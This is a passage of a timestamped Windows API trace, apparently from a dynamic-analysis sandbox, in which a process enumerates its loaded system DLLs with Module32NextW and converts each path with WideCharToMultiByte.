	[0102.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINHTTP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINHTTP.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINHTTP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINHTTP.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.780] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NETAPI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NETAPI32.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETAPI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETAPI32.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.782] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SAMCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SAMCLI.DLL", lpUsedDefaultChar=0x0) returned 31
	[0102.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAMCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAMCLI.DLL", lpUsedDefaultChar=0x0) returned 11
	[0102.783] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\Secur32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\Secur32.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Secur32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Secur32.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.784] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\iertutil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\iertutil.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iertutil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iertutil.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.785] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll", lpUsedDefaultChar=0x0) returned 48
	[0102.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ondemandconnroutehelper.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ondemandconnroutehelper.dll", lpUsedDefaultChar=0x0) returned 28
	[0102.787] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WinSCard.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WinSCard.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinSCard.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinSCard.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.788] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DEVOBJ.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DEVOBJ.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEVOBJ.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEVOBJ.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.789] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPT32.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPT32.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.791] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSASN1.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSASN1.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.792] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SRVCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SRVCLI.DLL", lpUsedDefaultChar=0x0) returned 31
	[0102.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SRVCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SRVCLI.DLL", lpUsedDefaultChar=0x0) returned 11
	[0102.793] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SAMLIB.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SAMLIB.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAMLIB.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAMLIB.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.794] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\BROWCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\BROWCLI.DLL", lpUsedDefaultChar=0x0) returned 32
	[0102.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROWCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BROWCLI.DLL", lpUsedDefaultChar=0x0) returned 12
	[0102.810] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINMM.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINMM.dll", lpUsedDefaultChar=0x0) returned 30
	[0102.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINMM.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINMM.dll", lpUsedDefaultChar=0x0) returned 10
	[0102.812] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINMMBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINMMBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0102.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINMMBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINMMBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0102.813] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\mswsock.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\mswsock.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mswsock.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mswsock.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.814] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINNSI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINNSI.DLL", lpUsedDefaultChar=0x0) returned 31
	[0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINNSI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINNSI.DLL", lpUsedDefaultChar=0x0) returned 11
	[0102.818] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NSI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NSI.dll", lpUsedDefaultChar=0x0) returned 28
	[0102.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NSI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NSI.dll", lpUsedDefaultChar=0x0) returned 8
	[0102.820] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DNSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DNSAPI.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DNSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DNSAPI.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.821] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\urlmon.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\urlmon.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="urlmon.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="urlmon.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.822] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\wkscli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\wkscli.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wkscli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wkscli.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.823] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcrypt.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcrypt.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.825] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTSP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTSP.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTSP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTSP.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.826] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\rsaenh.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\rsaenh.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rsaenh.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rsaenh.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.828] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\clbcatq.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\clbcatq.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clbcatq.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clbcatq.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.829] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\fwpuclnt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\fwpuclnt.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fwpuclnt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fwpuclnt.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.830] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\rasadhlp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\rasadhlp.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rasadhlp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rasadhlp.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.831] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\schannel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\schannel.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="schannel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="schannel.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.832] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\mskeyprotect.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\mskeyprotect.dll", lpUsedDefaultChar=0x0) returned 37
	[0102.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mskeyprotect.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mskeyprotect.dll", lpUsedDefaultChar=0x0) returned 17
	[0102.834] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ncrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ncrypt.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ncrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncrypt.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.835] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NTASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NTASN1.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NTASN1.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.836] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINTRUST.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINTRUST.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINTRUST.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINTRUST.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.837] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\gpapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\gpapi.dll", lpUsedDefaultChar=0x0) returned 30
	[0102.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gpapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gpapi.dll", lpUsedDefaultChar=0x0) returned 10
	[0102.838] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\ncryptsslp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\ncryptsslp.dll", lpUsedDefaultChar=0x0) returned 35
	[0102.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ncryptsslp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncryptsslp.dll", lpUsedDefaultChar=0x0) returned 15
	[0102.839] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL", lpUsedDefaultChar=0x0) returned 34
	[0102.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dhcpcsvc6.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dhcpcsvc6.DLL", lpUsedDefaultChar=0x0) returned 14
	[0102.840] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL", lpUsedDefaultChar=0x0) returned 33
